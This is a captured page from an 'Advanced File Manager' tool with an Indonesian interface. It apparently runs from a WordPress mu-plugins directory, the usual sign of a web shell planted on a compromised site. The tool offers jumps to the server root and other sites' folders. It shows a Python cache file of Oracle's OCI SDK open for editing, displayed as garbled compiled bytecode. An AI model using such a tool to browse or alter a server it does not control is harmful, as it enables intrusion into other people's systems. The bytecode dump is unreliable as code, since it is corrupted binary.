📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
oci
›
database
›
models
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/oci/database/models/__pycache__
💾
Free:
45.4 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: autonomous_db_preview_version_summary.cpython-39.opt-1.pyc
a ���f�# � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdZdZdd� Ze dd � �Z e jd d � �Z e dd� �Zejd d� �Ze dd� �Z e jdd� �Z e dd� �Zejdd� �Ze dd� �Zejdd� �Zdd� Zdd� Zdd� ZdS )�!AutonomousDbPreviewVersionSummaryz� The Autonomous Database preview version. Note that preview version software is only available for `Autonomous Database Serverless instances`__. __ https://docs.oracle.com/en/cloud/paas/autonomous-database/serverless/ �OLTP�DW�AJD�APEXc K sF dddddd�| _ dddddd�| _d | _d | _d | _d | _d | _d S ) a� Initializes a new AutonomousDbPreviewVersionSummary object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param version: The value to assign to the version property of this AutonomousDbPreviewVersionSummary. :type version: str :param time_preview_begin: The value to assign to the time_preview_begin property of this AutonomousDbPreviewVersionSummary. :type time_preview_begin: datetime :param time_preview_end: The value to assign to the time_preview_end property of this AutonomousDbPreviewVersionSummary. :type time_preview_end: datetime :param db_workload: The value to assign to the db_workload property of this AutonomousDbPreviewVersionSummary. Allowed values for this property are: "OLTP", "DW", "AJD", "APEX", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type db_workload: str :param details: The value to assign to the details property of this AutonomousDbPreviewVersionSummary. :type details: str �strZdatetime)�version�time_preview_begin�time_preview_end�db_workload�detailsr ZtimePreviewBeginZtimePreviewEndZ dbWorkloadr N)Z swagger_typesZ attribute_map�_version�_time_preview_begin�_time_preview_end�_db_workload�_details)�self�kwargs� r �]/usr/lib/python3.9/site-packages/oci/database/models/autonomous_db_preview_version_summary.py�__init__$ s"